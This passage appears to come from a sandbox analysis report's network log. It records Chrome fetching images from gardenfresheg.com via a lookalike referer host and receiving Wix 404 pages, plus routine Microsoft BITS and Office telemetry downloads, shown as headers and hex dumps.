                                  Data Ascii: patible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link href="//st
                                  2024-11-12 15:41:11 UTC1349INData Raw: 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6c 6f 63 61 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d
                                  Data Ascii: //static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/app.js"></script> ... --><script> angular.m


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.449755184.28.90.27443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:11 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  Accept-Encoding: identity
                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                  Range: bytes=0-2147483646
                                  User-Agent: Microsoft BITS/7.8
                                  Host: fs.microsoft.com
                                  2024-11-12 15:41:12 UTC515INHTTP/1.1 200 OK
                                  ApiVersion: Distribute 1.1
                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                  Content-Type: application/octet-stream
                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                  Server: ECAcc (lpl/EF06)
                                  X-CID: 11
                                  X-Ms-ApiVersion: Distribute 1.2
                                  X-Ms-Region: prod-weu-z1
                                  Cache-Control: public, max-age=176668
                                  Date: Tue, 12 Nov 2024 15:41:11 GMT
                                  Content-Length: 55
                                  Connection: close
                                  X-CID: 2
                                  2024-11-12 15:41:12 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.449756185.230.63.1714435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:12 UTC653OUTGET /wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg HTTP/1.1
                                  Host: gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:12 UTC959INHTTP/1.1 301 Moved Permanently
                                  Date: Tue, 12 Nov 2024 15:41:12 GMT
                                  Content-Length: 0
                                  Connection: close
                                  location: https://www.gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg
                                  x-wix-cache-control: public, max-age=86400
                                  strict-transport-security: max-age=86400
                                  x-wix-request-id: 1731426072.6319066123334152826
                                  Age: 0
                                  Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=virginia-pub
                                  X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLjn2q1aJi0ei0DEE6vDk2MwtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRalhUZPH4uZs7McO94/9n7qUcNvr8OmSxV6o8az75sVYpDjJGOx+KaS5XjeOa1pBq71Q==,2UNV7KOq4oGjA5+PKsX47KfzPE//3nkW42+EGxO7wZZBgoOYGa1MpluGPPjG4/Tb,/B3VgDtICCNDWQOEWfZmMluU10TCztQMHhgL2Ub5wy8=,QCwmNx1TNUYLIqEqVA58OGrL5QIbbhdAZMtl9k/EvDUj6r0AZAMucqm4C7kwBEyaGbuDVMLC73nuBvy48N2uMw==
                                  Cache-Control: no-cache
                                  Server: Pepyaka
                                  X-Wix-Request-Id: 1731426072.6319066123334152826
                                  X-Content-Type-Options: nosniff


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.44975734.149.87.454435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:13 UTC701OUTGET /wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpg HTTP/1.1
                                  Host: www.gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Cookie: XSRF-TOKEN=1731426071|w2lIPHb04GLH
                                  2024-11-12 15:41:13 UTC1166INHTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Language: en-US
                                  Strict-Transport-Security: max-age=86400
                                  X-Wix-Request-Id: 1731426073.6171574372110879043
                                  X-Envoy-Upstream-Service-Time: 28
                                  Cache-Control: public,max-age=0,must-revalidate
                                  Server: Pepyaka
                                  X-Content-Type-Options: nosniff
                                  Accept-Ranges: bytes
                                  Age: 0
                                  Date: Tue, 12 Nov 2024 15:41:13 GMT
                                  X-Served-By: cache-dfw-kdfw8210146-DFW
                                  X-Cache: MISS
                                  Vary: Accept-Encoding
                                  Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_virginia-pub_g
                                  X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLsQfxK/4OJfMqFNoqj30vnQtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRaljSbm6PaHMoQN1r36ftI8Mqnq0OSObgIv7Lha1xzY5FZf3GT9uter9v+1vi3OZFsTA==,2UNV7KOq4oGjA5+PKsX47JyuBROT9i54+nG4R7p6sZ8xwy5Yb789UDkEfaJNWrtQ,/B3VgDtICCNDWQOEWfZmMhrajZZqXm0GZVbjkREVNHw=,QCwmNx1TNUYLIqEqVA58OFubz7nrauxKn5DXivcdVVAj6r0AZAMucqm4C7kwBEyaGkUsehRBdDpOTAXQWUerRQ==
                                  Transfer-Encoding: chunked
                                  Via: 1.1 google
                                  glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2024-11-12 15:41:13 UTC212INData Raw: 62 39 30 0d 0a 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74
                                  Data Ascii: b90 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="ut
                                  2024-11-12 15:41:13 UTC1378INData Raw: 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f
                                  Data Ascii: f-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollo
                                  2024-11-12 15:41:13 UTC1378INData Raw: 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6c 6f 63 61 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e
                                  Data Ascii: e.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/app.js"></script>
                                  2024-11-12 15:41:13 UTC4INData Raw: 0d 0a 0d 0a
                                  Data Ascii:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.449758185.230.63.1714435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:14 UTC645OUTGET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1
                                  Host: gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-11-12 15:41:14 UTC785INHTTP/1.1 301 Moved Permanently
                                  Date: Tue, 12 Nov 2024 15:41:14 GMT
                                  Content-Length: 0
                                  Connection: close
                                  location: https://www.gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpg
                                  x-wix-cache-control: public, max-age=86400
                                  strict-transport-security: max-age=86400
                                  Age: 32
                                  Server-Timing: cache;desc=hit, varnish;desc=hit, dc;desc=virginia-pub
                                  X-Seen-By: oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLhfRTNpb91QFeEGzAgcx85QtFZnRrnvyqOEKpetNb+u3,2d58ifebGbosy5xc+FRaljZofkqMm3jITMLIJOBsAeTICVtTfoNCdaSNNj+2QqaAmFdt9TW1Lv9ajWp9MDhoHViB5QmpRe2J37zq9nDD6cs=,2UNV7KOq4oGjA5+PKsX47KfzPE//3nkW42+EGxO7wZZBgoOYGa1MpluGPPjG4/Tb
                                  Cache-Control: no-cache
                                  X-Wix-Request-Id: 1731426074.525157689871883065
                                  Server: Pepyaka
                                  X-Content-Type-Options: nosniff


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.44975934.149.87.454435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:15 UTC693OUTGET /wp-content/uploads/2024/02/Garden-fresh-logo.jpg HTTP/1.1
                                  Host: www.gardenfresheg.com
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://gardenfresheg.com.americanfoodeg.com/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  Cookie: XSRF-TOKEN=1731426071|w2lIPHb04GLH
                                  2024-11-12 15:41:15 UTC1060INHTTP/1.1 404 Not Found
                                  Content-Length: 2960
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Language: en-US
                                  Strict-Transport-Security: max-age=86400
                                  Age: 33
                                  X-Wix-Request-Id: 1731426075.7832467454141425782
                                  Cache-Control: public,max-age=0,must-revalidate
                                  Server: Pepyaka
                                  X-Wix-Request-Id: 1731426075.7832467454141425782
                                  X-Content-Type-Options: nosniff
                                  Accept-Ranges: bytes
                                  Date: Tue, 12 Nov 2024 15:41:15 GMT
                                  X-Served-By: cache-dfw-kdfw8210131-DFW
                                  X-Cache: MISS
                                  Vary: Accept-Encoding
                                  Server-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_virginia-pub_g
                                  X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLpdEzMYKCp26gkPw6kWLDGFCPTwZfAOtG6c4e6CNbdc7,2d58ifebGbosy5xc+FRalsvvvRhDHkl4QmamNNXQWfzHLCXalq4Uhi7XtnaIvABb4VScU/RLDFuvDomIP5xCfViB5QmpRe2J37zq9nDD6cs=,2UNV7KOq4oGjA5+PKsX47EX4ArvKW2rSVXB8jSb0NZlBgoOYGa1MpluGPPjG4/Tb
                                  Via: 1.1 google
                                  glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  2024-11-12 15:41:15 UTC318INData Raw: 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65
                                  Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conte
                                  2024-11-12 15:41:15 UTC1378INData Raw: 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 66 6f 6e 74 73 2f 48 65 6c 76 65 74 69 63 61 2f 66 6f 6e 74 46 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22
                                  Data Ascii: le> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="
                                  2024-11-12 15:41:15 UTC1264INData Raw: 6c 65 2f 6d 65 73 73 61 67 65 73 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 61 70 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 20 20 61 6e 67 75 6c 61 72 2e 6d 6f 64 75 6c 65 28 27 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 27 29 2e 63 6f 6e 73 74 61 6e 74 28 27 73 74 61 74 69 63 73 55 72 6c 27 2c 20 27 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65
                                  Data Ascii: le/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/se


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  12192.168.2.44976313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:41:59 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:41:59 UTC471INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:41:59 GMT
                                  Content-Type: text/plain
                                  Content-Length: 218853
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Cache-Control: public
                                  Last-Modified: Mon, 11 Nov 2024 13:19:38 GMT
                                  ETag: "0x8DD02537E74B538"
                                  x-ms-request-id: 38692f1b-b01e-0002-0984-341b8f000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154159Z-17df447cdb5fh5hghC1DFWam0400000009a00000000043gv
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:41:59 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                  2024-11-12 15:41:59 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                  Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                  2024-11-12 15:41:59 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                  Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                  2024-11-12 15:41:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                  Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
